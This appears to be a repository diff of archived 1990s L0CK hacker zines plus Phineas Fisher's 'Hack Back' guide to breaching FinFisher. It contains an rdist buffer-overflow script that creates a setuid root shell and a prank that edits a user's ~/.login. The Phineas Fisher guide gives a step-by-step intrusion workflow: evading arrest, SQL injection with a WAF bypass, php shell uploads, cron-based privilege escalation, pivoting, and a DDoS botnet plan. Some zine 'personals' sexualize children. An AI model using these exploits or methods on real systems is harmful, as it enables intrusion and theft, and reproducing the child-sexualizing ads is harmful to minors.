system("echo logout >> ~/.login");
|
||||
printf("hello world\n");
|
||||
|
||||
|
||||
if (strcmp(argv[1], "-x") == 0) {
|
||||
if (argc < 3) {
|
||||
exit(2);
|
||||
}
|
||||
fmt = "%x.%x.%x.%x";
|
||||
argv++;
|
||||
}
|
||||
|
||||
sscanf(argv[1], fmt, &a0, &a1, &a2, &a3);
|
||||
addr[0] = (unsigned char)a0;
|
||||
addr[1] = (unsigned char)a1;
|
||||
addr[2] = (unsigned char)a2;
|
||||
addr[3] = (unsigned char)a3;
|
||||
printf("%d.%d.%d.%d:\n", a0, a1, a2, a3);
|
||||
|
||||
if ((host = gethostbyaddr(addr, 4, AF_INET)) == NULL) {
|
||||
printf("[L0CK] H0ZT NAME ALL Br0KED\n");
|
||||
} else {
|
||||
puts(host->h_name);
|
||||
ptr = host->h_aliases;
|
||||
while (*ptr != NULL) {
|
||||
puts(*ptr);
|
||||
ptr++;
|
||||
}
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
---------------> KUT HERE AZ WELL <-------------------
|
||||
|
||||
|
||||
Ok below u will find my cuztomized rdist overfl0w exploit
|
||||
it shuld b obvious az 2 how it werkz.. umm itz a shell skript
|
||||
or something. - blewt
|
||||
-------------> KUT HERE <-----------------------------
|
||||
|
||||
#!/bin/sh
|
||||
SUID=/tmp/.rewtin
|
||||
cat <<_EOF_ > test
|
||||
TaaaaL0CKL0CKL0CKL0CKL0CKaaL0CKl0CKL0CKL0CKL0CKL0CKL0CKL0CKL0CKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
||||
a
|
||||
QL0CKL0CKL0CKL0CKL0CKL0CKL0CK
|
||||
QL0CKL0CKL0CKLC0KL0CKL0Ck
|
||||
QaaaL0CKL0CKL0CKaaaaaaaaa
|
||||
QaaaaaaaaL0CKL0CKaaaaaaa
|
||||
Scp /bin/sh $SUID
|
||||
Schmod 4755 $SUID
|
||||
_EOF_
|
||||
cat test | /usr/ucb/rdist -Server localhost
|
||||
rm -rf test
|
||||
if [ -f $SUID ]; then
|
||||
echo "$SUID <---- instar00t [K0URTESY 0F L0CK]"
|
||||
fi
|
||||
------------------> KUT HERE 2<----------------------
|
||||
|
||||
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
||||
Disclaimer: By continuing to read past this point you are hereby agreeing that
|
||||
this information is for interest value only, and that you will never actually
|
||||
physically act out or reproduce anything mentioned below. Further more, you are
|
||||
agreeing that the author/authors of this article and the people responsible for
|
||||
distrubuting it can in NOÿway be held responsible for its contents or any side-
|
||||
effects/incidents directly or indirectly caused by this information. - RAgent
|
||||
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
||||
RAgent And VaxBuster POZZE Productions
|
||||
presents
|
||||
"HOW TO RIP OFF COIN-OPERATED PHOTOCOPY MACHINES"
|
||||
|
||||
We've all had to do, projects/assignments, and needed to make some
|
||||
photocopies out of Book, so you can plagiarize it, when ya get home (I
|
||||
personally just pull out the page(s) i need.), And if u need to copy 10 or so
|
||||
pages, your up for some dosh.
|
||||
|
||||
So when i was at school, sitting in the library, contemplating, should i either (1) Use
|
||||
my last 2 bucks to buy a Pie and Big M for lunch or (2), get those photocopies
|
||||
i need for my Project on the life cycle of the frog (Sounds like Fun hey ...).
|
||||
Their was no question to what i was gonna Do. Hmmmmmmm Meat PIE.
|
||||
|
||||
So to Fill up my time, a buddy and i, went over to the photocopying
|
||||
machine, and when ppl were just about to press the copy button, we'd press
|
||||
the return coin button. Its was rather amusing, watching them trying figure
|
||||
out why the photocopier was not working. Anyway, my friend decided he was going
|
||||
to forfeit his lunch and do some copying.
|
||||
|
||||
Every time he tried to copy, i'd press the coin return Button.
|
||||
After about 20 attempts at trying to photocopy, he got me kicked out (the
|
||||
Bastard).
|
||||
|
||||
But while messing around, i discovered this:
|
||||
|
||||
If you press the copy button and the return coin button, at the same time, it
|
||||
would return your coin and make the copy.
|
||||
|
||||
It won't work everytime, but if ya practice, u can get it to work most of the
|
||||
time which sure as hell beats paying for the shit.
|
||||
|
||||
BTW if you're interested in anarchy and what it means to be a TRUE anarchist
|
||||
then here is a list of the all time greats who have written books on the
|
||||
subject, go to your state library and check them out (yeah I know library's
|
||||
aren't the kewlest of places to hang out :( -
|
||||
|
||||
WILLIAM GODWIN
|
||||
PETER KROPOTKIN
|
||||
PIERRE JOSEPH PROUDHON
|
||||
G.P. MAXIMOFF
|
||||
VERNON RICHARDS
|
||||
TOLSTOY
|
||||
HERBERT EDWARD READ
|
||||
GEORGE WOODCOCK
|
||||
JAMES JOLL
|
||||
DANIEL GUERIN
|
||||
APRIL CARTER
|
||||
DAVID E. APTER
|
||||
LEONARD I. KRIMERMAN
|
||||
LEWIS PERRY
|
||||
IRVING L. HOROWITZ
|
||||
P. ELTZBACHER
|
||||
PAUL AVRICH
|
||||
FRANCO VENTURI
|
||||
DAVID FOOTMAN
|
||||
|
||||
|
||||
|
||||
Closing Remarks
|
||||
~~~~~~~~~~~~~~~
|
||||
w0rds cannot begin 2 describe the way mutual masturbation with
|
||||
my [L0CK] brothers makes me feel...
|
||||
|
||||
- sarlo
|
||||
[L0CK]
|
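Review bot: The disclaimer line "distrubuting it can in NOÿway be held responsible" carries a stray "ÿ", which suggests L0CK/l0ck1.txt was written in an 8-bit encoding and imported without converting it or declaring the encoding. Decide whether the archive keeps the original bytes or normalizes to UTF-8, and record that choice in a README or .gitattributes entry next to L0CK/, since other high-bit characters in the file would be affected the same way. The single very long line inside the rdist heredoc is also worth comparing against the source copy, because tools that wrap or truncate long lines would change it silently.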
261
L0CK/l0ck4.txt
Normal file
|
@ -0,0 +1,261 @@
|
|||
|
||||
|
||||
|
||||
|
||||
\ _ _ / ARG! ARG! ARG! ARG! ARG! ARG! \ _ _ /
|
||||
\((___))/ \((___))/
|
||||
[ o x ] L0CK communications [ o x ]
|
||||
|(_)| ...presents... |(_)|
|
||||
( o ) ( o )
|
||||
/ (_) \ the GNU October 1995 release. / (_) \
|
||||
/ Let's Pretend I'm the adult and you're the little \
|
||||
boy.. So Grab Ur 3-D Glasses! L0CK is BACK!
|
||||
|
||||
|
||||
|
||||
......................................................................
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Table_Of_Contents
|
||||
~~~~~~~~~~~~~~~~~
|
||||
|
||||
hacking college computers..................sarlo
|
||||
letters to L0CK............................blewt
|
||||
L0CK personals.............................max-q
|
||||
the warrior's prayer.......................blewt
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
......................................................................
|
||||
|
||||
|
||||
|
||||
|
||||
***THE FOLLOWING IS FOR INFORMATIONAL PURPOSES ONLY***
|
||||
***I ACCEPT NO RESPONSABILITY FOR ANYTHING YOU DO***
|
||||
***WHICH GETS YOU ARRESTED OR SOMETHING***
|
||||
|
||||
&%&%&%&%&%&%&%& Fun with Temple's Computers &%&%&%&%&%&%&%&%
|
||||
|
||||
Shut up what's the number!?
|
||||
|
||||
Gee your impatient...
|
||||
2400 - (215)204-9630
|
||||
9600 - (215)204-9638
|
||||
14400 - (215)204-2800
|
||||
|
||||
So what the hell do I get?
|
||||
|
||||
The following is a log of my activites...
|
||||
Pardon my stuoidyt I'm not familiar with the system...
|
||||
It is short but to me it looks like you could have a LOTTA fun !
|
||||
|
||||
CONNECT 14400/ARQ
|
||||
C
|
||||
|
||||
|
||||
Welcome to TempleNet - Temple University's Ethernet network
|
||||
|
||||
Enter a Command followed by [Return] or [Enter].
|
||||
|
||||
Command: Description:
|
||||
telnet astro Astro Unix system
|
||||
tn3270 ibm IBM mainframe
|
||||
telnet library Temple's library catalog
|
||||
|
||||
For HELP, call the Network HOTLINE at 204-6529.
|
||||
|
||||
**Dialin for up to 2400 bps: 204-9630 thru 9634 (40 ports to WiseOwl)
|
||||
**Dialin for up to 9600 bps: 204-9638 (7 ports to WiseOwl)
|
||||
**Dialin for up to 14400 bps: 204-2800 (64 ports to TempleNet)
|
||||
|
||||
This system is restricted to authorized Temple University users and is
|
||||
subject to audit. The unauthorized access, use, or modification of any
|
||||
network component is a criminal violation of federal and state laws. (4)
|
||||
|
||||
|
||||
|
||||
|
||||
TempleNet>telnet ibm
|
||||
Trying IBM (155.247.14.2)... Open
|
||||
.
|
||||
|
||||
.exit
|
||||
|
||||
HCPCFC015E Command not valid before LOGON: EXIT
|
||||
|
||||
Enter one of the following commands:
|
||||
|
||||
LOGON userid (Example: LOGON VMUSER1)
|
||||
LOGOFF
|
||||
.logon vmuser1
|
||||
|
||||
HCPLGA053E VMUSER1 not in CP directory
|
||||
|
||||
Enter one of the following commands:
|
||||
|
||||
LOGON userid (Example: LOGON VMUSER1)
|
||||
LOGOFF
|
||||
.logoff
|
||||
|
||||
LOGOFF AT 22:27:26 EDT FRIDAY 06/09/95
|
||||
|
||||
[Connection to IBM closed by foreign host]
|
||||
TempleNet>
|
||||
|
||||
TempleNet>?
|
||||
|
||||
connect <host> Connect to host - same as typing just a host name
|
||||
disconnect <cn> Break the connection specified by name or number
|
||||
exit, quit, logout Exit from the EXEC
|
||||
lat <service> Connect to service using DEC LAT protocol
|
||||
lock Lock the terminal
|
||||
name-connection Give a connection a logical name
|
||||
resume Make the named connection be current
|
||||
rlogin <host> Connect to host using rlogin protocol
|
||||
show <cmd> Information commands, type "show ?" for list
|
||||
slip <addr> Enter SLIP mode
|
||||
systat Show terminal lines and users
|
||||
telnet <host> Connect to host using telnet protocol
|
||||
tn3270 <host> Connect to host using telnet protocol (3270)
|
||||
terminal Change terminal's parameters, type "terminal ?"
|
||||
where Show open connections
|
||||
xremote Enter XRemote mode
|
||||
<cr> To resume connection
|
||||
|
||||
TempleNet>
|
||||
|
||||
TempleNet>telnet astro
|
||||
Trying ASTRO (155.247.165.100)... Open
|
||||
|
||||
|
||||
EP/IX (astro)
|
||||
|
||||
login: user1
|
||||
Password:
|
||||
UX:login: ERROR: Login incorrect
|
||||
|
||||
NO CARRIER
|
||||
|
||||
Now remember ... :-)
|
||||
This system is restricted to authorized Temple University users and is
|
||||
subject to audit. The unauthorized access, use, or modification of any
|
||||
network component is a criminal violation of federal and state laws. (4)
|
||||
|
||||
Have fun with it!(Oh by the way I dialed the number by "accident" Hehehe)
|
||||
|
||||
-Sarlo 10/13/95 [L0CK]
|
||||
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
LETTERS TO [L0CK]
|
||||
Dear [L0CK],
|
||||
I have been dating my boyfreind for almost 2 years and i thought i really
|
||||
loved him. But a few months ago i met another guy who is absolutely
|
||||
adoreable and lots of fun to be with. I feel guilty and miserable when
|
||||
I'm with this other man. What sould I do, [L0CK]?
|
||||
- Torn Between Two Lovers
|
||||
|
||||
Dear Torn,
|
||||
Ah the classic love triangle. The situation is really not fair to anyone,
|
||||
but the longer you stay in it the stickier it will get.[teehee] Get your
|
||||
long-term relationship out in the open. Whatever you decide to do, do it
|
||||
fast and gently!
|
||||
- blewt [L0CK]
|
||||
******************************************************************************
|
||||
ATTENTION: WE DECIDED TO ADD A NEW SECTION TO THE [L0CK] GNUZLETTER: THIS IS
|
||||
IN LARGE PART DUE TO LOTS OF MEN WRITTING ME AND ASKING ME TO PRINT THEIR
|
||||
PERSONALS. I HAD MY DOUBTS ABOUT IT, BUT SINCE MANY MEN HAVE NOT FOUND TRUE
|
||||
LOVE LIKE I HAVE WITH MY BROTHERS, I FELT PITY FOR THEM. JUST LIKE BATMAN
|
||||
AND ROBIN, WALLY AND THE BEAVER, SKIPPER AND GILLIGAN, MINOR THREAT AND
|
||||
MUCHO MAAS THEY CAN FIND TRUE BROTHERLY HAPPINESS. - MAX-Q
|
||||
*****************************************************************************
|
||||
|
|
||||
COCK-A-DOODLE-DOO | JOIN IN OUR PAGAN MEETINGS
|
||||
|
|
||||
Pre-Op Transexual Marine looking | A Bi-Weekly Discussion of Life
|
||||
for boys who like red bottoms and | and Homosexuality. Call and be
|
||||
propper punishment. | involved. 703-360-8427
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
|
||||
ARE YOU AFRAID OF THE DARK | ORAL ATHLETIC AND FLEXIBLE
|
||||
|
|
||||
Confused About Relationships and | Seeking Discreet Dominant Male
|
||||
tired of being hassled by nosey | for sensual stimulation and some
|
||||
Investigators from the Child Welfare | Phantastic times. You Know what
|
||||
Agencey? We Can Help. Discreet. | You want! Come and Get it!
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
|
||||
YOU KNOW THE CONSEQUENCES | YOUR SPECIAL AD
|
||||
|
|
||||
Help Me Seize Young Offenders and | COULD BE RIGHT HERE #@!
|
||||
their Equipment. I'll Show You an |
|
||||
Interjudicial Proceeding that will | SEND ELECTRONIC MAIL TO:
|
||||
Change Your Lifestyle! | MAX-Q@2600.COM
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
|
||||
ARE YOU 11 OR 12 ??? | Str41Gh+ Act1nG M4l3 (El1t3)
|
||||
|
|
||||
Looking for men 11 - 12 for adult | L00k1ng F0r MasCul1n3 Sh0rt GuY
|
||||
video satisfaction. I am 35 into | f0R s4fe T1m3s. I w4n+ t0 B3
|
||||
Professional wrestling. | Tr34t3d Juzt L1k3 a L1tTle g1rL.
|
||||
Let's talk soon : 505-984-8800 | d0 m3 n0w!! : 516-T0o-kRAd
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
|
||||
LET'S BE FREE | MUCH OLDER GENTLEMAN
|
||||
|
|
||||
Gay White Male 38, 5'11" looking | Looking For Asian Boy 12 - 18
|
||||
for men, 12 - 32 clean, fit, and | who is petite. Someone to go
|
||||
hairy. Discreet Encounters. | out with. Very Discreet.
|
||||
Call Anytime : 516-751-2600 | Call Tonight! 011-61-2-368-0041
|
||||
|
|
||||
--------------------------------------+---------------------------------------
|
||||
|
||||
"The Warrior's Prayer," by blewt [L0CK]
|
||||
|
||||
To my ancestors, whom I shall leave anonymous, and my man, max-q:
|
||||
|
||||
I leave this day for battle.
|
||||
I know not whom I fight.
|
||||
The victory is not certain.
|
||||
For our enemies are strong.
|
||||
|
||||
I carry myself with courage.
|
||||
Though I quake with fear.
|
||||
I fight them all with honor.
|
||||
For I have my brothers near.
|
||||
|
||||
Oh ye I pray to thee,
|
||||
Those who came before,
|
||||
For the strength of heart I need...
|
||||
Just to lift this keyboard.
|
||||
|
||||
I know I seem the coward,
|
||||
Standing on the snow.
|
||||
I no longer wear my armor.
|
||||
I have lost my will to love.
|
||||
|
||||
What can I do with this life,
|
||||
O ye in the beyond?
|
||||
How can I look the others in the face,
|
||||
Now that my will to love is gone?
|
||||
|
||||
So to thee I say my final goodbye,
|
||||
And a hardy forget-me-not.
|
||||
For I'll always have my brothers,
|
||||
And together we are [L0CK].
|
||||
|
||||
- blewt - 1995
|
||||
|
||||
|
407
PhineasFisher/1.txt
Executable file
|
@ -0,0 +1,407 @@
|
|||
_ _ _ ____ _ _
|
||||
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
|
||||
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
|
||||
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|
||||
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
|
||||
|
||||
A DIY Guide for those without the patience to wait for whistleblowers
|
||||
|
||||
|
||||
--[ 1 ]-- Introduction
|
||||
|
||||
I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
|
||||
it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple
|
||||
it is, and to hopefully inform and inspire you to go out and hack shit. If you
|
||||
have no experience with programming or hacking, some of the text below might
|
||||
look like a foreign language. Check the resources section at the end to help you
|
||||
get started. And trust me, once you've learned the basics you'll realize this
|
||||
really is easier than filing a FOIA request.
|
||||
|
||||
|
||||
--[ 2 ]-- Staying Safe
|
||||
|
||||
This is illegal, so you'll need to take same basic precautions:
|
||||
|
||||
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
|
||||
2) Inside the encrypted volume install Whonix [1]
|
||||
3) (Optional) While just having everything go over Tor thanks to Whonix is
|
||||
probably sufficient, it's better to not use an internet connection connected
|
||||
to your name or address. A cantenna, aircrack, and reaver can come in handy
|
||||
here.
|
||||
|
||||
[0] https://truecrypt.ch/downloads/
|
||||
[1] https://www.whonix.org/wiki/Download#Install_Whonix
|
||||
|
||||
As long as you follow common sense like never do anything hacking related
|
||||
outside of Whonix, never do any of your normal computer usage inside Whonix,
|
||||
never mention any information about your real life when talking with other
|
||||
hackers, and never brag about your illegal hacking exploits to friends in real
|
||||
life, then you can pretty much do whatever you want with no fear of being v&.
|
||||
|
||||
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
|
||||
for some things like web browsing, when it comes to using hacking tools like
|
||||
nmap, sqlmap, and nikto that are making thousands of requests, they will run
|
||||
very slowly over Tor. Not to mention that you'll want a public IP address to
|
||||
receive connect back shells. I recommend using servers you've hacked or a VPS
|
||||
paid with bitcoin to hack from. That way only the low bandwidth text interface
|
||||
between you and the server is over Tor. All the commands you're running will
|
||||
have a nice fast connection to your target.
|
||||
|
||||
|
||||
--[ 3 ]-- Mapping out the target
|
||||
|
||||
Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
|
||||
domain names, and reverse whois lookups to find all IP address space and domain
|
||||
names associated with an organization.
|
||||
|
||||
[0] http://ha.ckers.org/fierce/
|
||||
|
||||
For an example let's take Blackwater. We start out knowing their homepage is at
|
||||
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
|
||||
67.238.84.228 email.academi.com
|
||||
67.238.84.242 extranet.academi.com
|
||||
67.238.84.240 mail.academi.com
|
||||
67.238.84.230 secure.academi.com
|
||||
67.238.84.227 vault.academi.com
|
||||
54.243.51.249 www.academi.com
|
||||
|
||||
Now we do whois lookups and find the homepage of www.academi.com is hosted on
|
||||
Amazon Web Service, while the other IPs are in the range:
|
||||
NetRange: 67.238.84.224 - 67.238.84.255
|
||||
CIDR: 67.238.84.224/27
|
||||
CustName: Blackwater USA
|
||||
Address: 850 Puddin Ridge Rd
|
||||
|
||||
Doing a whois lookup on academi.com reveals it's also registered to the same
|
||||
address, so we'll use that as a string to search with for the reverse whois
|
||||
lookups. As far as I know all the actual reverse whois lookup services cost
|
||||
money, so I just cheat with google:
|
||||
"850 Puddin Ridge Rd" inurl:ip-address-lookup
|
||||
"850 Puddin Ridge Rd" inurl:domaintools
|
||||
|
||||
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
|
||||
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
|
||||
whois lookups and repeat the process until you've found everything.
|
||||
|
||||
Also just google the organization and browse around its websites. For example on
|
||||
academi.com we find links to a careers portal, an online store, and an employee
|
||||
resources page, so now we have some more:
|
||||
54.236.143.203 careers.academi.com
|
||||
67.132.195.12 academiproshop.com
|
||||
67.238.84.236 te.academi.com
|
||||
67.238.84.238 property.academi.com
|
||||
67.238.84.241 teams.academi.com
|
||||
|
||||
If you repeat the whois lookups and such you'll find academiproshop.com seems to
|
||||
not be hosted or maintained by Blackwater, so scratch that off the list of
|
||||
interesting IPs/domains.
|
||||
|
||||
In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
|
||||
was simply a whois lookup of finfisher.com which found it registered to the name
|
||||
"FinFisher GmbH". Googling for:
|
||||
"FinFisher GmbH" inurl:domaintools
|
||||
finds gamma-international.de, which redirects to finsupport.finfisher.com
|
||||
|
||||
...so now you've got some idea how I map out a target.
|
||||
This is actually one of the most important parts, as the larger the attack
|
||||
surface that you are able to map out, the easier it will be to find a hole
|
||||
somewhere in it.
|
||||
|
||||
|
||||
--[ 4 ]-- Scanning & Exploiting
|
||||
|
||||
Scan all the IP ranges you found with nmap to find all services running. Aside
|
||||
from a standard port scan, scanning for SNMP is underrated.
|
||||
|
||||
Now for each service you find running:
|
||||
|
||||
1) Is it exposing something it shouldn't? Sometimes companies will have services
|
||||
running that require no authentication and just assume it's safe because the url
|
||||
or IP to access it isn't public. Maybe fierce found a git subdomain and you can
|
||||
go to git.companyname.come/gitweb/ and browse their source code.
|
||||
|
||||
2) Is it horribly misconfigured? Maybe they have an ftp server that allows
|
||||
anonymous read or write access to an important directory. Maybe they have a
|
||||
database server with a blank admin password (lol stratfor). Maybe their embedded
|
||||
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's
|
||||
default password.
|
||||
|
||||
3) Is it running an old version of software vulnerable to a public exploit?
|
||||
|
||||
|
||||
Webservers deserve their own category. For any webservers, including ones nmap
|
||||
will often find running on nonstandard ports, I usually:
|
||||
|
||||
1) Browse them. Especially on subdomains that fierce finds which aren't intended
|
||||
for public viewing like test.company.com or dev.company.com you'll often find
|
||||
interesting stuff just by looking at them.
|
||||
|
||||
2) Run nikto [0]. This will check for things like webserver/.svn/,
|
||||
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
|
||||
mistakes and misconfigurations.
|
||||
|
||||
3) Identify what software is being used on the website. WhatWeb is useful [1]
|
||||
|
||||
4) Depending on what software the website is running, use more specific tools
|
||||
like wpscan [2], CMS-Explorer [3], and Joomscan [4].
|
||||
|
||||
First try that against all services to see if any have a misconfiguration,
|
||||
publicly known vulnerability, or other easy way in. If not, it's time to move
|
||||
on to finding a new vulnerability:
|
||||
|
||||
5) Custom coded web apps are more fertile ground for bugs than large widely used
|
||||
projects, so try those first. I use ZAP [5], and some combination of its
|
||||
automated tests along with manually poking around with the help of its
|
||||
intercepting proxy.
|
||||
|
||||
6) For the non-custom software they're running, get a copy to look at. If it's
|
||||
free software you can just download it. If it's proprietary you can usually
|
||||
pirate it. If it's proprietary and obscure enough that you can't pirate it you
|
||||
can buy it (lame) or find other sites running the same software using google,
|
||||
find one that's easier to hack, and get a copy from them.
|
||||
|
||||
[0] http://www.cirt.net/nikto2
|
||||
[1] http://www.morningstarsecurity.com/research/whatweb
|
||||
[2] http://wpscan.org/
|
||||
[3] https://code.google.com/p/cms-explorer/
|
||||
[4] http://sourceforge.net/projects/joomscan/
|
||||
[5] https://code.google.com/p/zaproxy/
|
||||
|
||||
|
||||
For finsupport.finfisher.com the process was:
|
||||
|
||||
* Start nikto running in the background.
|
||||
|
||||
* Visit the website. See nothing but a login page. Quickly check for sqli in the
|
||||
login form.
|
||||
|
||||
* See if WhatWeb knows anything about what software the site is running.
|
||||
|
||||
* WhatWeb doesn't recognize it, so the next question I want answered is if this
|
||||
is a custom website by Gamma, or if there are other websites using the same
|
||||
software.
|
||||
|
||||
* I view the page source to find a URL I can search on (index.php isn't
|
||||
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
|
||||
allinurl:"Scripts/scripts.js.php"
|
||||
|
||||
* I find there's a handful of other sites using the same software, all coded by
|
||||
the same small webdesign firm. It looks like each site is custom coded but
|
||||
they share a lot of code. So I hack a couple of them to get a collection of
|
||||
code written by the webdesign firm.
|
||||
|
||||
At this point I can see the news stories that journalists will write to drum
|
||||
up views: "In a sophisticated, multi-step attack, hackers first compromised a
|
||||
web design firm in order to acquire confidential data that would aid them in
|
||||
attacking Gamma Group..."
|
||||
|
||||
But it's really quite easy, done almost on autopilot once you get the hang of
|
||||
it. It took all of a couple minutes to:
|
||||
|
||||
* google allinurl:"Scripts/scripts.js.php" and find the other sites
|
||||
|
||||
* Notice they're all sql injectable in the first url parameter I try.
|
||||
|
||||
* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with
|
||||
the option --tamper='tamper/modsecurityversioned.py'
|
||||
|
||||
* Acquire the admin login information, login and upload a php shell [1] (the
|
||||
check for allowable file extensions was done client side in javascript), and
|
||||
download the website's source code.
|
||||
|
||||
[0] http://sqlmap.org/
|
||||
[1] https://epinna.github.io/Weevely/
|
||||
|
||||
Looking through the source code they might as well have named it Damn Vulnerable
|
||||
Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in
|
||||
javascript, and if you're unauthenticated the admin page just sends you back to
|
||||
the login page with a Location header, but you can have your intercepting proxy
|
||||
filter the Location header out and access it just fine.
|
||||
|
||||
[0] http://www.dvwa.co.uk/
|
||||
|
||||
Heading back over to the finsupport site, the admin /BackOffice/ page returns
|
||||
403 Forbidden, and I'm having some issues with the LFI, so I switch to using the
|
||||
sqli (it's nice to have a dozen options to choose from). The other sites by the
|
||||
web designer all had an injectable print.php, so some quick requests to:
|
||||
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
|
||||
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
|
||||
reveal that finsupport also has print.php and it is injectable. And it's
|
||||
database admin! For MySQL this means you can read and write files. It turns out
|
||||
the site has magicquotes enabled, so I can't use INTO OUTFILE to write files.
|
||||
But I can use a short script that uses sqlmap --file-read to get the php source
|
||||
for a URL, and a normal web request to get the HTML, and then finds files
|
||||
included or required in the php source, and finds php files linked in the HTML,
|
||||
to recursively download the source to the whole site.
|
||||
|
||||
Looking through the source, I see customers can attach a file to their support
|
||||
tickets, and there's no check on the file extension. So I pick a username and
|
||||
password out of the customer database, create a support request with a php shell
|
||||
attached, and I'm in!
|
||||
|
||||
|
||||
--[ 5 ]-- (fail at) Escalating
|
||||
|
||||
___________
|
||||
< got r00t? >
|
||||
-----------
|
||||
\ ^__^
|
||||
\ (oo)\_______
|
||||
(__)\ )\/\
|
||||
||----w |
|
||||
|| ||
|
||||
^^^^^^^^^^^^^^^^
|
||||
|
||||
Root over 50% of linux servers you encounter in the wild with two easy scripts,
|
||||
Linux_Exploit_Suggester [0], and unix-privesc-check [1].
|
||||
|
||||
[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
|
||||
[1] https://code.google.com/p/unix-privesc-check/
|
||||
|
||||
finsupport was running the latest version of Debian with no local root exploits,
|
||||
but unix-privesc-check returned:
|
||||
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
|
||||
www-data can write to /etc/cron.hourly/mgmtlicensestatus
|
||||
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
|
||||
can write to /etc/cron.hourly/webalizer
|
||||
|
||||
so I add to /etc/cron.hourly/webalizer:
|
||||
chown root:root /path/to/my_setuid_shell
|
||||
chmod 04755 /path/to/my_setuid_shell
|
||||
|
||||
wait an hour, and ....nothing. Turns out that while the cron process is running
|
||||
it doesn't seem to be actually running cron jobs. Looking in the webalizer
|
||||
directory shows it didn't update stats the previous month. Apparently after
|
||||
updating the timezone cron will sometimes run at the wrong time or sometimes not
|
||||
run at all and you need to restart cron after changing the timezone. ls -l
|
||||
/etc/localtime shows the timezone got updated June 6, the same time webalizer
|
||||
stopped recording stats, so that's probably the issue. At any rate, the only
|
||||
thing this server does is host the website, so I already have access to
|
||||
everything interesting on it. Root wouldn't get much of anything new, so I move
|
||||
on to the rest of the network.
|
||||
|
||||
|
||||
--[ 6 ]-- Pivoting
|
||||
|
||||
The next step is to look around the local network of the box you hacked. This
|
||||
is pretty much the same as the first Scanning & Exploiting step, except that
|
||||
from behind the firewall many more interesting services will be exposed. A
|
||||
tarball containing a statically linked copy of nmap and all its scripts that you
|
||||
can upload and run on any box is very useful for this. The various nfs-* and
|
||||
especially smb-* scripts nmap has will be extremely useful.
|
||||
|
||||
The only interesting thing I could get on finsupport's local network was another
|
||||
webserver serving up a folder called 'qateam' containing their mobile malware.
|
||||
|
||||
|
||||
--[ 7 ]-- Have Fun
|
||||
|
||||
Once you're in their networks, the real fun starts. Just use your imagination.
|
||||
While I titled this a guide for wannabe whistleblowers, there's no reason to
|
||||
limit yourself to leaking documents. My original plan was to:
|
||||
1) Hack Gamma and obtain a copy of the FinSpy server software
|
||||
2) Find vulnerabilities in FinSpy server.
|
||||
3) Scan the internet for, and hack, all FinSpy C&C servers.
|
||||
4) Identify the groups running them.
|
||||
5) Use the C&C server to upload and run a program on all targets telling them
|
||||
who was spying on them.
|
||||
6) Use the C&C server to uninstall FinFisher on all targets.
|
||||
7) Join the former C&C servers into a botnet to DDoS Gamma Group.
|
||||
|
